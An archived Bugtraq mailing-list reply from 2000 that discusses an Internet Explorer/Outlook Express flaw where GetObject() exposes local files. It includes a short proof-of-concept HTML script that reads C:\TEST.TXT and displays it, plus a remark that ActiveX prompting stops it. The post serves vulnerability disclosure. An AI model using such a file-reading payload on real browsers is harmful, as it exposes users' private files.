Bugtraq mailing list archives

Re: IE 5.5/Outlook Express security vulnerability - GetObject() expose user's files

From: Fabrice Prémel <fabrice () KESKIYA FR>
Date: Wed, 27 Sep 2000 12:03:34 GMT

------getobject1.html--------------------------------
<SCRIPT>
alert("This script reads C:\\TEST.TXT\nYou may need to create it");
a=GetObject("c:\\test.txt","htmlfile");
setTimeout("alert(a.body.innerText);",2000);
</SCRIPT>
-----------------------------------------------------


Just a quick note : if you have configured explorer so that it asks
you before executing ActiveX, it will prompt you before executing the
above script.
Tested on IE5.0/Win2000.

Fabrice.

Current thread:

IE 5.5/Outlook Express security vulnerability - GetObject() expose user's files Georgi Guninski (Sep 27)
- Re: IE 5.5/Outlook Express security vulnerability - GetObject() expose user's files Fabrice Prémel (Sep 27)